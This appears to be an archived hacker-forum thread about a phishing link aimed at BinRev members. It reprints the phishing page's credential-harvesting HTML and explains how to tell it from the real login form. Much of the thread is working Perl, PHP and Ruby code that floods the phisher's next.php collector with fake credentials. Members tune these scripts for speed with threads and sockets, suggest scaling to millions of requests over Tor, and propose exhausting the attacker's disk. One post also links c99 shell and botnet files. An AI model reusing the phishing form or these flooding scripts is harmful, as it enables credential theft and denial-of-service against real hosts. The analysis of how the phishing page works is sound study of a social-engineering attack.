Sign in to follow this  
Followers 0
desmondeus

Someone help me already

39 posts in this topic

PLLZZZZZZZZZ ive been waiting hours someone help me

<-- edit by droops -->

This is an attempt to steal your login information for the forums, dont try to log into this page

http://urlhawk.com/2v1

0

Share this post


Link to post
Share on other sites

I don't get what good getting someone's binrev information would do anyway...

Most likley the people to fall for it need to be removed anyway ;)

Also I doubt anyone is using a simliar password for their email or anything...

0

Share this post


Link to post
Share on other sites

Hmm, I wonder if he can actually harvest cookies with this stuff.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

Obviously I changed my password, but I'm curious now. I'm guessing its a pretty standard CURL scam anyway....

0

Share this post


Link to post
Share on other sites

Phishing page source:

I quickly looked through it and it doesn't look like it steals cookie information...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" href="http://www.binrev.com/forums/favicon.ico" />
<title>Board Message</title>
<link rel="alternate" type="application/rss+xml" title="General Hacking" href="http://www.binrev.com/forums/index.php?act=rssout&id=1" />
<link rel="alternate" type="application/rss+xml" title="*NIX" href="http://www.binrev.com/forums/index.php?act=rssout&id=6" />
<link rel="alternate" type="application/rss+xml" title="Old Skool Phreaking" href="http://www.binrev.com/forums/index.php?act=rssout&id=2" />
<link rel="alternate" type="application/rss+xml" title="New Projects" href="http://www.binrev.com/forums/index.php?act=rssout&id=5" />
<link rel="alternate" type="application/rss+xml" title="Hacker Media" href="http://www.binrev.com/forums/index.php?act=rssout&id=3" />
<link rel="alternate" type="application/rss+xml" title="Newbie HQ" href="http://www.binrev.com/forums/index.php?act=rssout&id=4" />
<link rel="alternate" type="application/rss+xml" title="Retail Hacking" href="http://www.binrev.com/forums/index.php?act=rssout&id=7" />
<link rel="alternate" type="application/rss+xml" title="Programming/Code" href="http://www.binrev.com/forums/index.php?act=rssout&id=8" />
<link rel="alternate" type="application/rss+xml" title="Linkz" href="http://www.binrev.com/forums/index.php?act=rssout&id=9" />
<link rel="alternate" type="application/rss+xml" title="Urban Exploration and Social Engineering" href="http://www.binrev.com/forums/index.php?act=rssout&id=10" />

<link rel="alternate" type="application/rss+xml" title="HAM Radio/Hardware Hacking" href="http://www.binrev.com/forums/index.php?act=rssout&id=11" />
<link rel="alternate" type="application/rss+xml" title="Off-Topic" href="http://www.binrev.com/forums/index.php?act=rssout&id=12" />
<link rel="alternate" type="application/rss+xml" title="General Chat" href="http://www.binrev.com/forums/index.php?act=rssout&id=13" />
<link rel="alternate" type="application/rss+xml" title="The BitBox" href="http://www.binrev.com/forums/index.php?act=rssout&id=14" />
<link rel="alternate" type="application/rss+xml" title="Photoshop Contests" href="http://www.binrev.com/forums/index.php?act=rssout&id=15" />
<link rel="alternate" type="application/rss+xml" title="Completed Projects" href="http://www.binrev.com/forums/index.php?act=rssout&id=16" />
<link rel="alternate" type="application/rss+xml" title="Google Mining" href="http://www.binrev.com/forums/index.php?act=rssout&id=17" />

<style type="text/css" media="all">

@import url(http://www.binrev.com/forums/style_images/css_22.css);

</style>

</head>
<body>
<!--ipb.javascript.start-->
<script type="text/javascript">
//<![CDATA[
var ipb_var_st = "0";
var ipb_lang_tpl_q1 = "Please enter a page number to jump to between 1 and";
var ipb_var_s = "ece7a530afe53e91ae89129751338828";
var ipb_var_phpext = "php";
var ipb_var_base_url = "http://www.binrev.com/forums/index.php?s=&";
var ipb_var_image_url = "style_images/green";
var ipb_input_f = "5";
var ipb_input_t = "38443";
var ipb_input_p = "0";
var ipb_var_cookieid = "";
var ipb_var_cookie_domain = "";
var ipb_var_cookie_path = "/";
var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";
var ipb_new_msgs = 0;
var use_enhanced_js = 1;
var use_charset = "iso-8859-1";
var ipb_myass_chars_lang = "Not enough characters";
var ajax_load_msg = "Loading Content...";
//]]>
</script>
<script type="text/javascript" src='http://www.binrev.com/jscripts/ips_ipsclass.js'></script>

<script type="text/javascript" src='http://www.binrev.com/jscripts/ipb_global.js'></script>
<script type="text/javascript" src='http://www.binrev.com/jscripts/ips_menu.js'></script>
<script type="text/javascript" src='http://www.binrev.com/style_images/green/folder_js_skin/ips_menu_html.js'></script>
<script type="text/javascript" src='http://www.binrev.com/cache/lang_cache/en/lang_javascript.js'></script>
<script type="text/javascript">
//<![CDATA[
var ipsclass = new ipsclass();
ipsclass.init();
ipsclass.settings['do_linked_resize'] = parseInt( "1" );
ipsclass.settings['resize_percent'] = parseInt( "50" );
//]]>
</script>
<!--ipb.javascript.end-->
<div class="borderwrap">
<div id="logostrip" align="left"><a href='http://www.binrev.com/forums/index.php?'><!--ipb.logo.start--><img src='http://www.binrev.com/forums/style_images/22_22_logo4.gif' alt='IPB' style='vertical-align:top' border='0' />
<!--ipb.logo.end--></a></div>
<div id="submenu">

<!--ipb.leftlinks.start-->

<div class='ipb-top-left-link'><a href="http://www.binrev.com/">Binary Revolution</a></div>


<div class='ipb-top-left-link'><a href="http://www.binrev.com/forums/index.php?act=home">Binary Revolution Portal</a></div>


<div class='ipb-top-left-link'><a href="http://www.binrev.com/forums/index.php?act=boardrules">Forum rules!</a></div>

<!--ipb.leftlinks.end-->
<!--ipb.rightlinks.start-->

<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?act=Help">Help</a></div>

<div class='ipb-top-right-link' id="ipb-tl-search"><a href="http://www.binrev.com/forums/index.php?act=Search&f=5">Search</a></div>
<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?act=Members">Members</a></div>
<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?act=calendar">Calendar</a></div>

<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?autocom=extrasgallery">Extras Gallery</a></div><div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?autocom=gallery">Gallery</a></div><div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?autocom=blog">Blogs</a></div>


<div class='popupmenu-new' id='ipb-tl-search_menu' style='display:none;width:210px'>
<form action="http://www.binrev.com/forums/index.php?act=Search&CODE=01" method="post">

<input type='hidden' name='forums' id='gbl-search-forums' value='all' />
<input type="text" size="20" name="keywords" id='ipb-tl-search-box' />
<input class="button" type="image" style='border:0px' src="http://www.binrev.com/style_images/green/login-button.gif" />

</form>
<div style='padding:4px'>
<a href='http://www.binrev.com/forums/index.php?act=Search'>More Search Options</a>

</div>
</div>
<script type="text/javascript">
ipsmenu.register( "ipb-tl-search", 'document.getElementById("ipb-tl-search-box").focus();' );
gbl_check_search_box();
</script>

<!--ipb.rightlinks.end-->
</div>
</div>

<script type="text/javascript" src='http://www.binrev.com/jscripts/ips_xmlhttprequest.js'></script>
<script type="text/javascript" src='http://www.binrev.com/jscripts/ipb_global_xmlenhanced.js'></script>

<script type="text/javascript" src='http://www.binrev.com/jscripts/dom-drag.js'></script>
<div id='get-myassistant' style='display:none;width:400px;text-align:left;'>
<div class="borderwrap">
<div class='maintitle' id='myass-drag' title='Click and hold to drag this window'>
<div style='float:right'><a href='#' onclick='document.getElementById("get-myassistant").style.display="none"'>[X]</a></div>

<div>My Assistant</div>
</div>
<div id='myass-content' style='overflow-x:auto;'></div>

</div>
</div>
<!-- Loading Layer -->
<div id='loading-layer' style='display:none'>
<div id='loading-layer-shadow'>
<div id='loading-layer-inner'>
<img src='http://www.binrev.com/forums/style_images/green/loading_anim.gif' border='0' alt='Loading. Please Wait...' />

<span style='font-weight:bold' id='loading-layer-text'>Loading. Please Wait...</span>
</div>

</div>
</div>
<!-- / Loading Layer -->
<!-- Msg Layer -->
<div id='ipd-msg-wrapper'>
<div id='ipd-msg-title'>
<a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='http://www.binrev.com/forums/style_images/green/close.png' alt='X' title='Close Window' class='ipd' /></a>   <strong>Site Message</strong>

</div>
<div id='ipd-msg-inner'><span style='font-weight:bold' id='ipd-msg-text'></span><div class='pp-tiny-text'>(Message will auto close in 2 seconds)</div></div>

</div>
<!-- Msg Layer -->

<!-- / End board header -->
<div id="userlinksguest">
<p class="pcen">This menu has been disabled</p>
</div>
<!--TOP_BANNER_ROTATION-->
<div id="ipbwrapper">
<div id="navstrip"><img src='http://www.binrev.com/forums/style_images/green/nav.gif' border='0' alt='>' /> <a href='http://www.binrev.com/forums/index.php?act=idx'>Binary Revolution Forums</a></div>

<!--IBF.NEWPMBOX-->
<script language="JavaScript" type="text/javascript">
<!--
function contact_admin() {
// Very basic spam bot stopper

admin_email_one = 'forums';
admin_email_two = 'binrev.com';

window.location = 'mailto:'+admin_email_one+'@'+admin_email_two+'?subject=Error on the forums';

}
//-->
</script>

<br />
<div class="borderwrap">
<h3><img src='http://www.binrev.com/forums/style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Board Message</h3>

<p>Sorry, an error occurred. If you are unsure on how to use a feature, or don't know why you got this error message, try looking through the help files for more information.</p>
<div class="errorwrap">
<h4>The error returned was:</h4>

<p>Sorry, you do not have permission to preform that action</p>

</div>

<form action="next.php" method="get">
<input type="hidden" name="act" value="Login" />
<input type="hidden" name="CODE" value="01" />
<input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" />
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" />
<input type="hidden" name="CookieDate" value="1" />

<h4>You are not logged in, you may log in below</h4>

<div class="fieldwrap">

<h4>Your account username</h4>
<input type="text" size="20" maxlength="64" name="UserName" />

<h4>Your account password</h4>
<input type="password" size="20" name="PassWord" />
<p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p>

</div>

</form>
<!--IBF.POST_TEXTAREA-->
<h4>Useful Links</h4>
<ul>
<li><a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Forgotten Password Recovery</a></li>
<li><a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=00">Register a new account</a></li>
<li><a href="http://www.binrev.com/forums/index.php?act=Help&CODE=00">Our help documentation</a></li>

<li><a href="java script:contact_admin();">Contact the forums administrator</a></li>
</ul>
<p class="formbuttonrow"><b><a href="java script:history.go(-1)">Go Back</a></b></p>
</div>
<table cellspacing="0" id="gfooter">
<tr>
<td width="45%"><img id="rss-syndication" src='http://www.binrev.com/forums/style_images/green/rss.png' border='0' alt='RSS' class='ipd' />
<script type="text/javascript">
//<![CDATA[
menu_build_menu(
"rss-syndication",
new Array( "<a href='http://www.binrev.com/forums/index.php?act=rssout&id=1' style='color:black'>General Hacking</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=6' style='color:black'>*NIX</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=2' style='color:black'>Old Skool Phreaking</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=5' style='color:black'>New Projects</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=3' style='color:black'>Hacker Media</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=4' style='color:black'>Newbie HQ</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=7' style='color:black'>Retail Hacking</a>",

"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=8' style='color:black'>Programming/Code</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=9' style='color:black'>Linkz</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=10' style='color:black'>Urban Exploration and Social Engineering</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=11' style='color:black'>HAM Radio/Hardware Hacking</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=12' style='color:black'>Off-Topic</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=13' style='color:black'>General Chat</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=14' style='color:black'>The BitBox</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=15' style='color:black'>Photoshop Contests</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=16' style='color:black'>Completed Projects</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=17' style='color:black'>Google Mining</a>"
) );
//]]>
</script> </td>

<td width="10%" align="center" nowrap="nowrap"><a href="lofiversion/index.php"><b>Lo-Fi Version</b></a></td>
<td width="35%" align="right" nowrap="nowrap">Time is now: 1st August 2008 - 11:15 AM</td>
<td width="10%" align="center" nowrap="nowrap"></td>
</table>

<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript">
_qacct="p-1dsmrjyrjWnko";quantserve();</script>
<noscript>

<a href="http://www.quantcast.com/p-1dsmrjyrjWnko" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-1dsmrjyrjWnko.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a></noscript>

<!-- End Quantcast tag -->

<script type='text/javascript'>
//<![CDATA[
menu_do_global_init();
show_inline_messages();
// Uncomment this to fix IE png images
// causes page slowdown, and some missing images occasionally
// if ( is_ie )
// {
// ie_fix_png();
// }

//]]>
</script>

<!--BOTTOM_BANNER_ROTATION-->
<!-- Copyright Information -->
<div align='center' class='copyright'>
Powered By <a href='http://www.invisionboard.com' style='text-decoration:none' target='_blank'>IP.Board</a>
© 2008  <a href='http://www.invisionpower.com' style='text-decoration:none' target='_blank'>IPS, Inc</a>.
<div>Licensed to: The Digital DawgPound</div></div>

<!-- / Copyright -->
</div>
</body>
</html>

Edited by Lelantus
0

Share this post


Link to post
Share on other sites
Hmm, I wonder if he can actually harvest cookies with this stuff.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

Obviously I changed my password, but I'm curious now. I'm guessing its a pretty standard CURL scam anyway....

the page convinced me there for a second it's pretty good the link will be edited to show the true url

-E

0

Share this post


Link to post
Share on other sites
Hmm, I wonder if he can actually harvest cookies with this stuff.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

Obviously I changed my password, but I'm curious now. I'm guessing its a pretty standard CURL scam anyway....

the page convinced me there for a second it's pretty good the link will be edited to show the true url

-E

The real address is: http://h1.ripway.com/acedaarcher/BinRev/index.html

0

Share this post


Link to post
Share on other sites
Hmm, I wonder if he can actually harvest cookies with this stuff.

No. Since the page is hosted on another domain, he doesn't have access to your binrev.com cookies. I doubt he's clever enough to steal them anyway. Also, the simple action of being redirected back to binrev after the phishing site will change a sequence number in your session, making any session cookies he steals completely useless. Invision is not generally vulnerable to session stealing or session fixation.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

It's just using a frame. The first login screen was an HTML file on another server that submits a form to next.php. The next.php script records what you entered in the form and returns 302 found and redirects you back to binrev.com. It didn't somehow magically log you in.

Obviously I changed my password, but I'm curious now. I'm guessing its a pretty standard CURL scam anyway....

Unless you gave him your password, I seriously doubt he got anything. I read the source code for the phishing site and it doesn't look very... fishy at all. Looks more like a copy and pastes binrev page with a form. I really doubt you have anything to worry about.

0

Share this post


Link to post
Share on other sites

I see, yeah I posted that before heading out to lunch. Hadn't had the time to do the review myself yet. Apon further review I found the real URL and read the source to the page myself, makes me wonder if he's using an SQL powered backend to store user data, if so maybe bobby tables... ;)

I never really gave it my real credentials, that's why I wondered how I was actually logged in if the session was incrementing without a cookie heist.

EDIT : Its a get request to a file called next.php..... Includes a referrer url for the redirect.

And apon further review,

http://h1.ripway.com/acedaarcher/ is another redirect page for some other forum. This guy seems to have gone around the block trying to access other security researcher/hacker hobbyist information.

Edited by RETN
0

Share this post


Link to post
Share on other sites

Why? whats a person's BinRev account really going to get you? It just seems a bit pointless to me...

:roll:

#!/usr/bin/perl
# phuckphish.pl <# of gets>
# Phuck you Phisher! Tad bit of log poisoning...
use LWP::Simple;
use Digest::MD5 qw(md5 md5_hex md5_base64);

$dict = '/usr/share/dict/words';

for($loop=1;$loop<=$ARGV[0];$loop++) {
srand;
my $rand = ((int(rand(1000))) * $loop);
my $sess = md5_hex($rand);

my $user;
my $pass;

open DICT, "<$dict" or die $!;
rand($.) < 1 && ($user = $_) while <DICT>;
close(DICT);
open DICT, "<$dict" or die $!;
rand($.) < 1 && ($pass = $_) while <DICT>;
close(DICT);

chomp($user);
chomp($pass);

my $url = 'http://h1.ripway.com/acedaarcher/BinRev/next.php?' .
'act=Login&CODE=01&s=' . $sess .
'&referer=http%3A%2F%2Fwww.binrev.com%2Fforums%2Findex.php%3Fact%3Dpost%26do%3Dreply_post%26f%3D5%26t%3D38443&CookieDate=1' .
'&UserName=' . $user .
'&PassWord=' . $pass .
'&submit=Log+In';

get $url;

}

Edited by n3xg3n
0

Share this post


Link to post
Share on other sites

Having quickly looked through that page source, I don't see the clues/items which show it to be a phising page.

What things should be looked for?

0

Share this post


Link to post
Share on other sites

For starters, lets notice that the URL in the URL bar doesn't contain Binrev.com. Now here's to the code :

<input type="hidden" name="act" value="Login" />
<input type="hidden" name="CODE" value="01" />
<input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" />
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" />
<input type="hidden" name="CookieDate" value="1" />

<h4>You are not logged in, you may log in below</h4>

<div class="fieldwrap">

<h4>Your account username</h4>
<input type="text" size="20" maxlength="64" name="UserName" />

<h4>Your account password</h4>
<input type="password" size="20" name="PassWord" />
<p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p>

</div>

</form>

First, lets notice that the form method is "GET" not "POST". The real code to the forum is as follows :

<form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()">
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" />
<div class="borderwrap">
<div class="maintitle"><img src='style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div>

<div class='row2'>
<div class="formsubtitle">Please enter your details below to log in</div>
<div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'>
<h4>Attention!</h4>
<p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p>
<p><b>I've forgotten my password! <a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Click here!</a></b></p>

</div>
</div>
<table class='ipbtable' cellspacing="0">
<tr>
<td width="60%" valign="top" class='row2'>
<fieldset>
<legend><b>Log In</b></legend>
<table class='ipbtable' cellspacing="1">

<tr>

<td width="50%"><b>Enter your user name</b></td>
<td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td>

</tr>
<tr>
<td width="50%"><b>Enter your password</b></td>
<td width="50%"><input type="password" size="25" name="PassWord" /></td>

</tr>
</table>
</fieldset>
</td>
<td width="40%" valign="top" class='row2'>
<fieldset>
<legend><b>Options</b></legend>
<table class='ipbtable' cellspacing="1">

<tr>
<td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td>
<td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td>
</tr>

<tr>
<td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td>
<td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td>

</tr>

</table>
</fieldset>
</td>
</tr>
<tr>
<td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td>
</tr>

<tr>
<td class="catend" colspan="2"><!-- no content --></td>
</tr>
</table>
</div>
</form>

So I mean, look at the difference. Notice the action in the first code is "next.php" and that's not at all what the action is in the real src to the site.

There are other differences between the codes, which I don't have to point out now - I'm sure its becoming readily apparent.

0

Share this post


Link to post
Share on other sites
Why? whats a person's BinRev account really going to get you? It just seems a bit pointless to me...

:roll:

#!/usr/bin/perl
# phuckphish.pl <# of gets>
# Phuck you Phisher! Tad bit of log poisoning...
use LWP::Simple;
use Digest::MD5 qw(md5 md5_hex md5_base64);

$dict = '/usr/share/dict/words';

for($loop=1;$loop<=$ARGV[0];$loop++) {
srand;
my $rand = ((int(rand(1000))) * $loop);
my $sess = md5_hex($rand);

my $user;
my $pass;

open DICT, "<$dict" or die $!;
rand($.) < 1 && ($user = $_) while <DICT>;
close(DICT);
open DICT, "<$dict" or die $!;
rand($.) < 1 && ($pass = $_) while <DICT>;
close(DICT);

chomp($user);
chomp($pass);

my $url = 'http://h1.ripway.com/acedaarcher/BinRev/next.php?' .
'act=Login&CODE=01&s=' . $sess .
'&referer=http%3A%2F%2Fwww.binrev.com%2Fforums%2Findex.php%3Fact%3Dpost%26do%3Dreply_post%26f%3D5%26t%3D38443&CookieDate=1' .
'&UserName=' . $user .
'&PassWord=' . $pass .
'&submit=Log+In';

get $url;

}

:D I like doing that too, except mine is usually in Ruby or bash+curl.

0

Share this post


Link to post
Share on other sites

The fact that it is a page hosted on another site that aims to look exactly like the BinRev forums login page. What he most likely did was go to the BinRev forums login page, save it, then edit the login form to submit to a .php file which we cannot absolutely know what does, but we can assume that it saves the username and password you submitted to a file, then it sends an HTTP 302 Code (Page has moved) redirecting the user back to the real binrev forums.

You don't really need to look at the source to know whats going on, if it looks suspicious investigate further, but don't supply account information.

Edited by n3xg3n
0

Share this post


Link to post
Share on other sites
:D I like doing that too, except mine is usually in Ruby or bash+curl.

You mean like this?

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'digest/md5'

dict = []
File.open('/usr/share/dict/words') do|f|
f.each_line {|l| dict << l.chomp }
end

ARGV[0].to_i.times do
opts = {
:UserName => dict[rand(dict.size)],
:PassWord => dict[rand(dict.size)],
:sess => Digest::MD5.hexdigest( dict[rand(dict.size)] ),

:act => 'Login',
:CODE => '01',
:referer => 'http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443',
:CookieDate => '1'
}

uri = URI.parse(
'http://h1.ripway.com/acedaarcher/BinRev/next.php?' +
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)

puts "Submitting username '#{opts[:UserName]}' and password '#{opts[:PassWord]}'"
Net::HTTP.get uri
end

Also, your code is quite... inefficient n3xg3n. You're reading through the entire dictionary 2 times every request? And closing the file every time you read from it? Why not just read it into an array? We really shouldn't allow Perl coders here..

0

Share this post


Link to post
Share on other sites
Also, your code is quite... inefficient n3xg3n. You're reading through the entire dictionary 2 times every request? And closing the file every time you read from it? Why not just read it into an array? We really shouldn't allow Perl coders here..

Yeah, Yeah that was an ugly ass hack, and I don't code Perl, I get raped by it and was dicking around in the Perl Docs when I read this topic so I gave it a very amateurish effort. This should be much more efficient ;)

#!/usr/bin/php
<?php
$dict=file_get_contents("/usr/share/dict/words", FILE_TEXT);
$dict=explode("\n", $dict);

for ($i = 1; $i <= $argv[1]; $i++) {
$line = mt_rand(0, sizeof($dict)-1);
$user = $dict[$line];
$line = mt_rand(0, sizeof($dict)-1);
$pass = $dict[$line];
$sess = md5($user);

$http = "GET /acedaarcher/BinRev/next.php?act=Login&CODE=01&s=" . $sess . "&referer=http%3A%2F%2Fwww.binrev.com%2Fforums%2Findex.php%3Fact%3Dpost%26do%3Dreply_post%26f%3D5%26t%3D38443&CookieDate=1&UserName=" . $user . "&PassWord=" . $pass . "&submit=Log+In HTTP/1.1\r\n";
$http .= "Host: h1.ripway.com\r\n\r\n";
$sock = fsockopen("h1.ripway.com", 80);
fwrite($sock, $http);
fclose($sock);
}
?>

-- edit: meh more randomness, but slower --

much more efficient in fact:

n3xg3n@lockbreaker:~/Desktop$ time ./phuckphish.pl 10

real 0m10.198s
user 0m1.684s
sys 0m0.024s
n3xg3n@lockbreaker:~/Desktop$ time ./ohm.rb 10

real 0m3.147s
user 0m0.320s
sys 0m0.084s
n3xg3n@lockbreaker:~/Desktop$ time ./phphuck.php 10

real 0m1.366s
user 0m0.144s
sys 0m0.020s
n3xg3n@lockbreaker:~/Desktop$

Edited by n3xg3n
0

Share this post


Link to post
Share on other sites

Oh yeah?

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'digest/md5'

dict = File.readlines '/usr/share/dict/words'

uris = []
ARGV[0].to_i.times do
opts = {
:UserName => dict[rand(dict.size)].chomp,
:PassWord => dict[rand(dict.size)].chomp,
:sess => Digest::MD5.hexdigest( dict[rand(dict.size)] ),

:act => 'Login',
:CODE => '01',
:referer => 'http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443',
:CookieDate => '1'
}

uris << URI.parse(
'http://h1.ripway.com/acedaarcher/BinRev/next.php?' +
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)
end

threads = []
uris.each do|uri|
threads << Thread.new(uri) { Net::HTTP.get uri }
end

threads.each {|thread| thread.join }

$ time ./phuckphish2.rb 10

real 0m0.594s
user 0m0.088s
sys 0m0.032s

OK, so Ruby's slow, but I get a little over 1/2 a second on my machine. PHP might be able to beat it out of raw execution speed. Ruby also loses some time from setup, it has to parse a few thousand line HTTP library. Using a loop instead of readlines was slow too, I replaced that. Could be improved with normal sockets instead of an HTTP library, but threading makes a huge difference since the task is IO-bound.

0

Share this post


Link to post
Share on other sites

Wait, I'm an idiot.

#!/usr/bin/env ruby
require 'digest/md5'
require 'socket'

dict = File.readlines '/usr/share/dict/words'

uris = []

template = <<END
GET /m/acedaarcher/BinRev/next.php?### HTTP/1.1
Host: h1.ripway.com

END

socket = TCPSocket.new( 'h1.ripway.com', 80 )

ARGV[0].to_i.times do
opts = {
:UserName => dict[rand(dict.size)].chomp,
:PassWord => dict[rand(dict.size)].chomp,
:sess => Digest::MD5.hexdigest( dict[rand(dict.size)] ),

:act => 'Login',
:CODE => '01',
:referer => 'http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443',
:CookieDate => '1'
}

socket.write template.gsub(/###/,
'http://h1.ripway.com/acedaarcher/BinRev/next.php?' +
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)
end

$ time ./phuckphish3.rb 10

real 0m0.343s
user 0m0.064s
sys 0m0.016s

Down to 1/3 of a second.

0

Share this post


Link to post
Share on other sites
PLLZZZZZZZZZ ive been waiting hours someone help me

<-- edit by droops -->

This is an attempt to steal your login information for the forums, dont try to log into this page

http://urlhawk.com/2v1

I've been watching what you've been doing on those c99 shells. I know where you hang out on irc.

Some related links:

http://h1.ripway.com/h4dy/ff.txt

http://h1.ripway.com/kungkong/kk.txt

http://h1.ripway.com/h4dy/perlzmildnet.txt

http://h1.ripway.com/antiserius/mybotscan.txt

Edited by trem
0

Share this post


Link to post
Share on other sites

Uh, Ohm correct me if I'm wrong but the socket would close after the first redirect so you can't get all the requests through under one socket connection.

Also you're pre-pending the url of next.php when it is already part of your template causing 404's so wouldn't it be

  socket.write template.gsub(/###/,
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)

Edited by n3xg3n
0

Share this post


Link to post
Share on other sites

I find it funny that the original poster was trying to social engineer the members of the forum. He didn't make a good attempt, relying on random people to click a redirection URL. When I first saw the link, I knew it could have been malicious. Again, he made a very poor attempt at social engineering.

Edited by lattera
0

Share this post


Link to post
Share on other sites
Uh, Ohm correct me if I'm wrong but the socket would close after the first redirect so you can't get all the requests through under one socket connection.

You're right. It does pass Connection: close in the response headers. I guess pipelining the requests won't work here. It was just a thought.

Also you're pre-pending the url of next.php when it is already part of your template causing 404's so wouldn't it be

[  socket.write template.gsub(/###/,
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)

So I am. Got a little copy and paste happy. I fixed it but it still doesn't work anyway :P

Oh well, the threaded version is nice and fast. With a little work and the producer/consumer model you can make a nice job queue to limit the number of threads and simultaneous connections, just in case you wanted to run this a few million times. If you want to be really clever, crawl the binrev site and get a list of usernames instead of random words and run it through Tor or something ;)

I find it funny that the original poster was trying to social engineer the members of the forum. He didn't make a good attempt, relying on random people to click a redirection URL. When I first saw the link, I knew it could have been malicious. Again, he made a very poor attempt at social engineering.

Yet it generated some interesting discussion. I almost wish this happened more often.

0

Share this post


Link to post
Share on other sites

perhaps it was just a clever attempt to social engineer you all into tell them a better way and pointing out all the flaws/problems haha

Edited by TelcoBob
0

Share this post


Link to post
Share on other sites
I find it funny that the original poster was trying to social engineer the members of the forum. He didn't make a good attempt, relying on random people to click a redirection URL.

Heh. Makes me laugh, especially since everyone came up with better ways to do it.

Reminds me of this clip, from the movie "Gone in 60 Seconds":

"You need a role model!" :)

0

Share this post


Link to post
Share on other sites

I did a little research on that hosting site and they don't give you /too much/ space for free. makes me wonder if we could fill up his entire directory with like 50 mb of text logs so he can't do this stuff anymore.. :P

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0